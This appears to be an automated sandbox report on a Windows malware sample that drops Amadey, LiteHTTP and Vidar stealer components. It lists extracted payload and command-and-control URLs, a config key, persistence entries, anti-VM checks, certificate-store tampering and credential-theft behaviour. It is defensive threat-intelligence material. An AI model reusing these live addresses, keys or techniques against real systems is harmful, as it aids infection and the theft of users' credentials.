Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 19:35
Static task
static1
Behavioral task
behavioral1
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
Resource
win10v2004-20250217-en
General
-
Target
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
-
Size
938KB
-
MD5
ab988dd02c8cea50ac224daf0e53f3e9
-
SHA1
050ebd6e5d25d9b84b722dcea79b2243890c1652
-
SHA256
44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192
-
SHA512
c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd
-
SSDEEP
24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/1248-537-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1248-538-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1248-534-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1248-532-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1248-530-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1248-528-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Litehttp family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1708 powershell.exe 15 2508 powershell.exe 16 2108 powershell.exe -
pid Process 1772 powershell.exe 1732 powershell.exe 1476 powershell.exe 1708 powershell.exe 2508 powershell.exe 2108 powershell.exe 1640 powershell.exe 712 powershell.exe -
Download via BitsAdmin 1 TTPs 6 IoCs
pid Process 1992 bitsadmin.exe 2464 bitsadmin.exe 2972 bitsadmin.exe 2740 bitsadmin.exe 2332 bitsadmin.exe 2180 bitsadmin.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 57 2956 rapes.exe 57 2956 rapes.exe 57 2956 rapes.exe 4 1708 powershell.exe 15 2508 powershell.exe 16 2108 powershell.exe 49 2956 rapes.exe 7 2956 rapes.exe 7 2956 rapes.exe 7 2956 rapes.exe 24 2956 rapes.exe 24 2956 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000900000001a4e6-505.dat net_reactor behavioral1/memory/2552-517-0x0000000000F10000-0x0000000000F70000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe -
Executes dropped EXE 25 IoCs
pid Process 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2956 rapes.exe 1480 SvhQA35.exe 2436 chromium.exe 2900 ce4pMzk.exe 2336 8372e5fe28.exe 2132 TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE 2692 483d2fa8a0d53818306efeb32d3.exe 1800 zY9sqWs.exe 2612 Ps7WqSx.exe 1864 FvbuInU.exe 2788 SvhQA35.exe 2856 chromium.exe 2552 mAtJWNv.exe 1248 mAtJWNv.exe 2128 ce4pMzk.exe 1952 Y87Oyyz.exe 2352 Y87Oyyz.exe 2404 SplashWin.exe 2420 SplashWin.exe 2248 MCxU5Fj.exe 2952 MCxU5Fj.exe 2580 MCxU5Fj.exe 2492 MCxU5Fj.exe 2864 OEHBOHk.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE -
Loads dropped DLL 56 IoCs
pid Process 1708 powershell.exe 1708 powershell.exe 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2956 rapes.exe 1480 SvhQA35.exe 2436 chromium.exe 2956 rapes.exe 2956 rapes.exe 2508 powershell.exe 2508 powershell.exe 2108 powershell.exe 2108 powershell.exe 2956 rapes.exe 2956 rapes.exe 2956 rapes.exe 2956 rapes.exe 2956 rapes.exe 2956 rapes.exe 2956 rapes.exe 2788 SvhQA35.exe 2856 chromium.exe 2956 rapes.exe 2956 rapes.exe 2552 mAtJWNv.exe 1640 WerFault.exe 1640 WerFault.exe 1640 WerFault.exe 2956 rapes.exe 2956 rapes.exe 1952 Y87Oyyz.exe 2352 Y87Oyyz.exe 2352 Y87Oyyz.exe 2404 SplashWin.exe 2404 SplashWin.exe 2404 SplashWin.exe 2404 SplashWin.exe 2420 SplashWin.exe 2420 SplashWin.exe 2420 SplashWin.exe 2956 rapes.exe 2248 MCxU5Fj.exe 2248 MCxU5Fj.exe 2248 MCxU5Fj.exe 2960 WerFault.exe 2960 WerFault.exe 2960 WerFault.exe 2960 WerFault.exe 2960 WerFault.exe 444 WerFault.exe 444 WerFault.exe 444 WerFault.exe 444 WerFault.exe 444 WerFault.exe 2956 rapes.exe 2956 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ZlvyLQxn\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8372e5fe28.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105750101\\8372e5fe28.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105760121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a431-205.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2956 rapes.exe 2132 TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE 2692 483d2fa8a0d53818306efeb32d3.exe 1864 FvbuInU.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2552 set thread context of 1248 2552 mAtJWNv.exe 87 PID 2248 set thread context of 2492 2248 MCxU5Fj.exe 100 PID 2420 set thread context of 2272 2420 SplashWin.exe 95 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1640 2552 WerFault.exe 86 2960 2248 WerFault.exe 97 444 2492 WerFault.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 45 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8372e5fe28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fltMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1636 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2164 schtasks.exe 2532 schtasks.exe 2360 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1708 powershell.exe 1708 powershell.exe 1708 powershell.exe 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2956 rapes.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 2900 ce4pMzk.exe 2508 powershell.exe 1640 powershell.exe 2508 powershell.exe 2508 powershell.exe 2132 TempMJX0NVTYPMIIVGABQEI1WLJGTVL3YVE4.EXE 1772 powershell.exe 1732 powershell.exe 1476 powershell.exe 2108 powershell.exe 2108 powershell.exe 2108 powershell.exe 2692 483d2fa8a0d53818306efeb32d3.exe 1800 zY9sqWs.exe 1800 zY9sqWs.exe 1800 zY9sqWs.exe 1800 zY9sqWs.exe 1864 FvbuInU.exe 1864 FvbuInU.exe 1864 FvbuInU.exe 1864 FvbuInU.exe 1864 FvbuInU.exe 2128 ce4pMzk.exe 2128 ce4pMzk.exe 2128 ce4pMzk.exe 2128 ce4pMzk.exe 2404 SplashWin.exe 2420 SplashWin.exe 2420 SplashWin.exe 712 powershell.exe 2272 cmd.exe 2272 cmd.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2420 SplashWin.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 2900 ce4pMzk.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 2128 ce4pMzk.exe Token: SeDebugPrivilege 712 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 2336 8372e5fe28.exe 2336 8372e5fe28.exe 2336 8372e5fe28.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 2336 8372e5fe28.exe 2336 8372e5fe28.exe 2336 8372e5fe28.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2900 wrote to memory of 3028 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 28 PID 2900 wrote to memory of 3028 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 28 PID 2900 wrote to memory of 3028 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 28 PID 2900 wrote to memory of 3028 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 28 PID 2900 wrote to memory of 3032 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 29 PID 2900 wrote to memory of 3032 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 29 PID 2900 wrote to memory of 3032 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 29 PID 2900 wrote to memory of 3032 2900 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 29 PID 3028 wrote to memory of 2164 3028 cmd.exe 31 PID 3028 wrote to memory of 2164 3028 cmd.exe 31 PID 3028 wrote to memory of 2164 3028 cmd.exe 31 PID 3028 wrote to memory of 2164 3028 cmd.exe 31 PID 3032 wrote to memory of 1708 3032 mshta.exe 32 PID 3032 wrote to memory of 1708 3032 mshta.exe 32 PID 3032 wrote to memory of 1708 3032 mshta.exe 32 PID 3032 wrote to memory of 1708 3032 mshta.exe 32 PID 1708 wrote to memory of 2612 1708 powershell.exe 36 PID 1708 wrote to memory of 2612 1708 powershell.exe 36 PID 1708 wrote to memory of 2612 1708 powershell.exe 36 PID 1708 wrote to memory of 2612 1708 powershell.exe 36 PID 2612 wrote to memory of 2956 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 37 PID 2612 wrote to memory of 2956 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 37 PID 2612 wrote to memory of 2956 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 37 PID 2612 wrote to memory of 2956 2612 TempO669PMRK0XGDEOZIGE8MCRPCLHGTK04W.EXE 37 PID 2956 wrote to memory of 2548 2956 rapes.exe 39 PID 2956 wrote to memory of 2548 2956 rapes.exe 39 PID 2956 wrote to memory of 2548 2956 rapes.exe 39 PID 2956 wrote to memory of 2548 2956 rapes.exe 39 PID 2548 wrote to memory of 776 2548 cmd.exe 41 PID 2548 wrote to memory of 776 2548 cmd.exe 41 PID 2548 wrote to memory of 776 2548 cmd.exe 41 PID 2548 wrote to memory of 776 2548 cmd.exe 41 PID 2548 wrote to memory of 2464 2548 cmd.exe 42 PID 2548 wrote to memory of 2464 2548 cmd.exe 42 PID 2548 wrote to memory of 2464 2548 cmd.exe 42 PID 2548 wrote to memory of 2464 2548 cmd.exe 42 PID 2548 wrote to memory of 2972 2548 cmd.exe 43 PID 2548 wrote to memory of 2972 2548 cmd.exe 43 PID 2548 wrote to memory of 2972 2548 cmd.exe 43 PID 2548 wrote to memory of 2972 2548 cmd.exe 43 PID 2548 wrote to memory of 2740 2548 cmd.exe 44 PID 2548 wrote to memory of 2740 2548 cmd.exe 44 PID 2548 wrote to memory of 2740 2548 cmd.exe 44 PID 2548 wrote to memory of 2740 2548 cmd.exe 44 PID 2956 wrote to memory of 1480 2956 rapes.exe 45 PID 2956 wrote to memory of 1480 2956 rapes.exe 45 PID 2956 wrote to memory of 1480 2956 rapes.exe 45 PID 2956 wrote to memory of 1480 2956 rapes.exe 45 PID 1480 wrote to memory of 2436 1480 SvhQA35.exe 47 PID 1480 wrote to memory of 2436 1480 SvhQA35.exe 47 PID 1480 wrote to memory of 2436 1480 SvhQA35.exe 47 PID 2956 wrote to memory of 2900 2956 rapes.exe 48 PID 2956 wrote to memory of 2900 2956 rapes.exe 48 PID 2956 wrote to memory of 2900 2956 rapes.exe 48 PID 2956 wrote to memory of 2900 2956 rapes.exe 48 PID 2956 wrote to memory of 2336 2956 rapes.exe 49 PID 2956 wrote to memory of 2336 2956 rapes.exe 49 PID 2956 wrote to memory of 2336 2956 rapes.exe 49 PID 2956 wrote to memory of 2336 2956 rapes.exe 49 PID 2336 wrote to memory of 2800 2336 8372e5fe28.exe 50 PID 2336 wrote to memory of 2800 2336 8372e5fe28.exe 50 PID 2336 wrote to memory of 2800 2336 8372e5fe28.exe 50 PID 2336 wrote to memory of 2800 2336 8372e5fe28.exe 50 PID 2336 wrote to memory of 2500 2336 8372e5fe28.exe 51
Processes
-
